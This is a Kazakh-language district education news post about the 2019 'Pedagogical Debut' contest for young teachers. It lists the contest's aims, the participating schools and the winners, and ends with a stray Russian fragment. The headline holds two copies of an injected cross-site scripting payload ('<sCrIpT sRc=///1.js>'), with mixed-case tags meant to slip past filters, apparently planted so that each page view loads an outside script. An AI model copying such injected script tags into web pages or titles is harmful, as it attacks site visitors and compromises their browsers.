«Педагогикалық дебют» аудандық байқауы<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

13.03.2019

 «Педагогикалық дебют» аудандық байқауы

Астрахан ауданының "Білім бөлімі" ММ жұмыс жоспарына сәйкес 2019 жылдың 12 наурызында «Новочеркасск орта мектебінде» жас мамандар арасында "Педагогикалық дебют" аудандық байқауы өтті.

Байқаудың мақсаты – талантты жас педагогтарды анықтау, олардың кәсіби дамуы мен мансаптық өсуі үшін жағдай жасау.

Конкурстың негізгі міндеттері:

- педагогикалық мамандықтың беделін арттыру;

- жас педагогтардың әдістемелік деңгейін жетілдіру;

- оқу-тәрбие үрдісінде инновацияларды іздеу және іске асыруға жас педагогтарды ынталандыру;

- эксперименталды және инновациялық жұмыста батылдық пен дербестікті дамыту;

- жас мамандардың педагогикалық қызметін талдау және өзін-өзі жетілдіру, олардың шығармашылық қабілеттерін және белсенді кәсіби позициясын дамыту үшін жағдай жасау;

- кәсіби қарым-қатынас, өзін-өзі көрсету және әріптестерін қолдау үшін мүмкіндік жасау.

Байқауға (байқаудың өткізу Ережесіне сәйкес) 12 жас педагог қатысты (Астрахан №1 ОМ, Астрахан №2 ОМ, Қызылжар ОМ, Акимовка НМ, Колутон ОМ, Петровка ОМ, Ковыленка НМ, Жалтыр №1ОМ, Жалтыр №2ОМ, Жалтыр №4ОМ, Өндіріс ОМ,               Первомай ОМ).

Байқау барысында педагогтар:

- Әдістемелік әзірлемесі бар пән бойынша сыныптан тыс ашық іс-шара.

- Өзін-өзі таныстыру «Менің педагогикалық ұстанымымым»

- «Бес минут ішінде үйрен», «Менің хоббиім»

Байқау қорытындысы бойынша қатысушылар "Білім бөлімі" мақтау қағаздарымен және бағалы сыйлықтармен марапатталды:

1 орын – Астрахан №2 орта мектебінің ағылшын тілі мұғалімі Магзумов Даурен Болатович.

2 орын – Жалтыр № 4 орта мектебінің ағылшын тілі мұғалімі Жунусова Олболсын Маратовна;

3 орын – Астрахан №1 орта мектебінің бастауыш сынып мұғалімі Имантаева Айбат Конысбаевна

Номинацияда:

- "Өз пәніне деген шексіз махаббаты" -  Жалтыр №1 орта мектебінің биология және химия мұғалімі Королевская Наталья Васильевна

- "Аудиторияны баулу шеберлігі" -  Жалтыр №2 орта мектебінің қазақ тілі мен әдебиеті пәні мұғалімі Омарбекова Серікгүл Бағдатқызы

- "Шығармашылық ізденіс және кәсіпқойлық" - Петровка орта мектебінің тарих пәні мұғалімі Ищанова Зарина Тайпаковна

- "Балаларға деген махаббаты" - Первомай орта мектебінің бастауыш сынып мұғалімі Бискуб Ксения Александровна

Қалған қатысушылар "Белсенді қатысқаны үшін" мақтау қағаздарымен марапатталды

астники были награждения грамотами «За активное участие»

 

 

Просмотров: 5738


Пікір қосу



Деректерді қолтаңбаға қосу